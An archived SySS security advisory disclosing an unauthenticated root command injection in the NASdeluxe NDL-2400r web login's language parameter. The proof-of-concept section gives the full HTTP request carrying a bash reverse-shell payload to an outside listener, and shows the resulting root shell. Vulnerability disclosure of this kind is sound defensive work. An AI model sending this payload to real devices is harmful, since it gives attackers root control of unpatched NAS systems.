exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NASdeluxe NDL-2400r 2.01.10 Command Injection

NASdeluxe NDL-2400r 2.01.10 Command Injection
Posted Aug 4, 2016
Authored by Klaus Eisentraut | Site syss.de

NASdeluxe NDL-2400r version 2.01.10 suffers from an OS command injection vulnerability.

tags | exploit
SHA-256 | df902fffe771a83318d68fb4a1dac2c82339e67536200c100f67b3f129f20ef4

NASdeluxe NDL-2400r 2.01.10 Command Injection

Change Mirror Download
Advisory ID: SYSS-2016-065
Product: NASdeluxe NDL-2400r
Vendor: Starline Computer GmbH
Affected Version(s): 2.01.10
Tested Version(s): 2.01.09
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: no fix (product has reached EOL since 3 years)
Vendor Notification: 2016-07-04
Public Disclosure: 2016-08-03
CVE Reference: Not assigned
Author of Advisory: Klaus Eisentraut, SySS GmbH, https://www.syss.de/advisories/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection
as root. No credentials are required to exploit this vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details / Proof-of-Concept:

The language parameter in the web interface login request of the product
"NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root.
The SySS GmbH sent the following HTTPS request to the webinterface:

~~~~~
POST /usr/usrgetform.html?name=index HTTP/1.1
Host: 192.168.1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen
~~~~~

After sending the request, a reverse shell connected back:

~~~~~
# nc -lvvp 443
Listening on any address 443 (https)
Connection from 192.168.1.1:49070
bash: no job control in this shell
bash-3.00# whoami
root
bash-3.00# cat /img/version
2.01.09
~~~~~

The tested firmware version was 2.01.09. The most current version is
2.01.10 according to the web page of the vendor [3]. However there are
no hints of a security update in the release notes [4]. Thus, the SySS
GmbH assumes that this vulnerability is likely also present in the most
current firmware version from 2009-10-22.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The product has reached end-of-life (EOL) status since more than three
years. Thus, no patch will be provided by the vendor.

It is highly recommended to migrate to one of the newer and still
supported NAS solutions which are (according to Starline Computer GmbH)
not affected by this vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-06-29: Vulnerability discovered
2016-07-04: asked info@starline.de for contact person (no answer)
2016-07-22: sent this advisory to info@starline.de
2016-07-22: response from vendor: won't fix (product reached EOL >3 years)
2016-08-03: public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS GmbH, SYSS-2016-065
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-065.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
[3] NASdeluxe Homepage
https://www.nasdeluxe.com/
[4] NDL-2400R Firmware Release Notes
https://www.nasdeluxe.com/wp-content/uploads/2008/12/NDL-2400R_NDL-2500T_FWRN_v2_01_10.171.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Klaus Eisentraut of the SySS
GmbH.

E-Mail: klaus.eisentraut@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Klaus_Eisentraut.asc
Key ID: 0xBAC677AE
Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    20 Files
  • 31
    Jan 31st
    31 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close